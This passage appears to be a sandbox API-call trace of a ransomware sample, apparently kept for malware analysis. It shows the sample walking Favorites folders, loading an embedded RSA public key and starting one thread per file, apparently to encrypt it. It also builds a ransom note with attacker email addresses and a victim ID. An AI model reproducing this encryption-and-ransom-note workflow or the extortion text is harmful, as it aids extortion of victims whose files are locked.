[0136.664] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0136.664] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 1 [0136.664] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 0 [0136.664] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0136.664] lstrcmpW (lpString1="Microsoft Websites", lpString2="..") returned 1 [0136.664] lstrcmpW (lpString1="Microsoft Websites", lpString2=".") returned 1 [0136.664] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\Default\\Favorites" | out: lpString1="C:\\Users\\Default\\Favorites") returned="C:\\Users\\Default\\Favorites" [0136.664] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Favorites\\") returned="C:\\Users\\Default\\Favorites\\" [0136.664] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\", lpString2="Microsoft Websites" | out: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites") returned="C:\\Users\\Default\\Favorites\\Microsoft Websites" [0136.664] SetErrorMode (uMode=0x1) returned 0x1 [0136.664] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Favorites\\Microsoft Websites" | out: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites") returned="C:\\Users\\Default\\Favorites\\Microsoft Websites" [0136.664] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned="C:\\Users\\Default\\Favorites\\Microsoft Websites\\" [0136.664] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned="C:\\Users\\Default\\Favorites\\Microsoft Websites\\" [0136.664] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\*.*") returned="C:\\Users\\Default\\Favorites\\Microsoft Websites\\*.*" [0136.664] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3d11398 [0136.669] PathFindFileNameW (pszPath="C:\\Users\\Default\\Favorites\\Microsoft Websites") returned="Microsoft Websites" [0136.669] lstrcpyW (in: lpString1=0x17b644, lpString2="Microsoft Websites" | out: lpString1="Microsoft Websites") returned="Microsoft Websites" [0136.669] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0136.669] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0136.669] lstrcmpW (lpString1="IE Add-on site.url", lpString2="..") returned 1 [0136.669] lstrcmpW (lpString1="IE Add-on site.url", lpString2=".") returned 1 [0136.669] StrStrW (lpFirst="IE Add-on site.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0136.669] StrStrW (lpFirst="IE Add-on site.url", lpSrch="ntldr") returned 0x0 [0136.669] StrStrW (lpFirst="IE Add-on site.url", lpSrch="NTLDR") returned 0x0 [0136.669] StrStrW (lpFirst="IE Add-on site.url", lpSrch="NTDETECT.COM") returned 0x0 [0136.669] StrStrW (lpFirst="IE Add-on site.url", lpSrch="ntdetect.com") returned 0x0 [0136.669] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpSrch="Desktop") returned 0x0 [0136.669] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpSrch="DESKTOP") returned 0x0 [0136.669] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned 50 [0136.669] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0136.669] lstrcpyW (in: lpString1=0x17be7c, lpString2="IE Add-on site.url" | out: lpString1="IE Add-on site.url") returned="IE Add-on site.url" [0136.669] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" [0136.669] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x774 [0136.670] Sleep (dwMilliseconds=0x96) [0136.817] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0136.817] lstrcmpW (lpString1="IE site on Microsoft.com.url", lpString2="..") returned 1 [0136.817] lstrcmpW (lpString1="IE site on Microsoft.com.url", lpString2=".") returned 1 [0136.817] StrStrW (lpFirst="IE site on Microsoft.com.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0136.817] StrStrW (lpFirst="IE site on Microsoft.com.url", lpSrch="ntldr") returned 0x0 [0136.817] StrStrW (lpFirst="IE site on Microsoft.com.url", lpSrch="NTLDR") returned 0x0 [0136.817] StrStrW (lpFirst="IE site on Microsoft.com.url", lpSrch="NTDETECT.COM") returned 0x0 [0136.817] StrStrW (lpFirst="IE site on Microsoft.com.url", lpSrch="ntdetect.com") returned 0x0 [0136.817] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpSrch="Desktop") returned 0x0 [0136.817] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpSrch="DESKTOP") returned 0x0 [0136.817] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned 50 [0136.817] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0136.818] lstrcpyW (in: lpString1=0x17be7c, lpString2="IE site on Microsoft.com.url" | out: lpString1="IE site on Microsoft.com.url") returned="IE site on Microsoft.com.url" [0136.818] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" [0136.818] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x778 [0136.818] Sleep (dwMilliseconds=0x96) [0136.973] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0136.973] lstrcmpW (lpString1="Microsoft At Home.url", lpString2="..") returned 1 [0136.973] lstrcmpW (lpString1="Microsoft At Home.url", lpString2=".") returned 1 [0136.973] StrStrW (lpFirst="Microsoft At Home.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0136.973] StrStrW (lpFirst="Microsoft At Home.url", lpSrch="ntldr") returned 0x0 [0136.974] StrStrW (lpFirst="Microsoft At Home.url", lpSrch="NTLDR") returned 0x0 [0136.974] StrStrW (lpFirst="Microsoft At Home.url", lpSrch="NTDETECT.COM") returned 0x0 [0136.974] StrStrW (lpFirst="Microsoft At Home.url", lpSrch="ntdetect.com") returned 0x0 [0136.974] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpSrch="Desktop") returned 0x0 [0136.974] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpSrch="DESKTOP") returned 0x0 [0136.974] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned 50 [0136.974] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0136.974] lstrcpyW (in: lpString1=0x17be7c, lpString2="Microsoft At Home.url" | out: lpString1="Microsoft At Home.url") returned="Microsoft At Home.url" [0136.974] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" [0136.974] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x77c [0136.974] Sleep (dwMilliseconds=0x96) [0137.129] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0137.129] lstrcmpW (lpString1="Microsoft At Work.url", lpString2="..") returned 1 [0137.129] lstrcmpW (lpString1="Microsoft At Work.url", lpString2=".") returned 1 [0137.129] StrStrW (lpFirst="Microsoft At Work.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0137.129] StrStrW (lpFirst="Microsoft At Work.url", lpSrch="ntldr") returned 0x0 [0137.129] StrStrW (lpFirst="Microsoft At Work.url", lpSrch="NTLDR") returned 0x0 [0137.129] StrStrW (lpFirst="Microsoft At Work.url", lpSrch="NTDETECT.COM") returned 0x0 [0137.129] StrStrW (lpFirst="Microsoft At Work.url", lpSrch="ntdetect.com") returned 0x0 [0137.130] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpSrch="Desktop") returned 0x0 [0137.130] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpSrch="DESKTOP") returned 0x0 [0137.130] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned 50 [0137.130] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0137.130] lstrcpyW (in: lpString1=0x17be7c, lpString2="Microsoft At Work.url" | out: lpString1="Microsoft At Work.url") returned="Microsoft At Work.url" [0137.130] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" [0137.130] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x780 [0137.130] Sleep (dwMilliseconds=0x96) [0137.285] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0137.285] lstrcmpW (lpString1="Microsoft Store.url", lpString2="..") returned 1 [0137.285] lstrcmpW (lpString1="Microsoft Store.url", lpString2=".") returned 1 [0137.286] StrStrW (lpFirst="Microsoft Store.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0137.286] StrStrW (lpFirst="Microsoft Store.url", lpSrch="ntldr") returned 0x0 [0137.286] StrStrW (lpFirst="Microsoft Store.url", lpSrch="NTLDR") returned 0x0 [0137.286] StrStrW (lpFirst="Microsoft Store.url", lpSrch="NTDETECT.COM") returned 0x0 [0137.286] StrStrW (lpFirst="Microsoft Store.url", lpSrch="ntdetect.com") returned 0x0 [0137.286] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpSrch="Desktop") returned 0x0 [0137.286] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpSrch="DESKTOP") returned 0x0 [0137.286] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned 50 [0137.286] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0137.286] lstrcpyW (in: lpString1=0x17be7c, lpString2="Microsoft Store.url" | out: lpString1="Microsoft Store.url") returned="Microsoft Store.url" [0137.286] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" [0137.286] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x784 [0137.286] Sleep (dwMilliseconds=0x96) [0137.441] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0137.441] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 1 [0137.442] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 0 [0137.442] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Favorites\\Microsoft Websites" | out: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites") returned="C:\\Users\\Default\\Favorites\\Microsoft Websites" [0137.442] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\*.*") returned="C:\\Users\\Default\\Favorites\\Microsoft Websites\\*.*" [0137.442] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpSrch="Desktop") returned 0x0 [0137.442] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpSrch="DESKTOP") returned 0x0 [0137.442] SetErrorMode (uMode=0x1) returned 0x1 [0137.442] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\_HELP_INSTRUCTION.TXT") returned 67 [0137.442] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0137.443] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0137.443] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x788) returned 0x0 [0137.443] RegQueryValueExW (in: hKey=0x788, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3d01690, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x3d01690*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0137.443] RegCloseKey (hKey=0x788) returned 0x0 [0137.443] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0137.443] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0137.443] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0137.444] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0137.446] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3d11398 [0137.446] PathFindFileNameW (pszPath="C:\\Users\\Default\\Favorites\\Microsoft Websites") returned="Microsoft Websites" [0137.447] lstrcpyW (in: lpString1=0x17b644, lpString2="Microsoft Websites" | out: lpString1="Microsoft Websites") returned="Microsoft Websites" [0137.447] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0137.447] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0137.447] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0137.447] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0137.447] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0137.447] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0137.447] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0137.447] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0137.447] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0137.447] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0137.447] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 1 [0137.450] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 0 [0137.450] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0137.450] lstrcmpW (lpString1="MSN Websites", lpString2="..") returned 1 [0137.451] lstrcmpW (lpString1="MSN Websites", lpString2=".") returned 1 [0137.451] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\Default\\Favorites" | out: lpString1="C:\\Users\\Default\\Favorites") returned="C:\\Users\\Default\\Favorites" [0137.451] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Favorites\\") returned="C:\\Users\\Default\\Favorites\\" [0137.451] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\", lpString2="MSN Websites" | out: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites") returned="C:\\Users\\Default\\Favorites\\MSN Websites" [0137.451] SetErrorMode (uMode=0x1) returned 0x1 [0137.451] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Favorites\\MSN Websites" | out: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites") returned="C:\\Users\\Default\\Favorites\\MSN Websites" [0137.451] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="C:\\Users\\Default\\Favorites\\MSN Websites\\" [0137.451] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="C:\\Users\\Default\\Favorites\\MSN Websites\\" [0137.451] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites\\*.*") returned="C:\\Users\\Default\\Favorites\\MSN Websites\\*.*" [0137.451] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3d11398 [0137.453] PathFindFileNameW (pszPath="C:\\Users\\Default\\Favorites\\MSN Websites") returned="MSN Websites" [0137.453] lstrcpyW (in: lpString1=0x17b644, lpString2="MSN Websites" | out: lpString1="MSN Websites") returned="MSN Websites" [0137.453] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0137.453] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0137.454] lstrcmpW (lpString1="MSN Autos.url", lpString2="..") returned 1 [0137.454] lstrcmpW (lpString1="MSN Autos.url", lpString2=".") returned 1 [0137.454] StrStrW (lpFirst="MSN Autos.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0137.454] StrStrW (lpFirst="MSN Autos.url", lpSrch="ntldr") returned 0x0 [0137.454] StrStrW (lpFirst="MSN Autos.url", lpSrch="NTLDR") returned 0x0 [0137.454] StrStrW (lpFirst="MSN Autos.url", lpSrch="NTDETECT.COM") returned 0x0 [0137.454] StrStrW (lpFirst="MSN Autos.url", lpSrch="ntdetect.com") returned 0x0 [0137.454] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\MSN 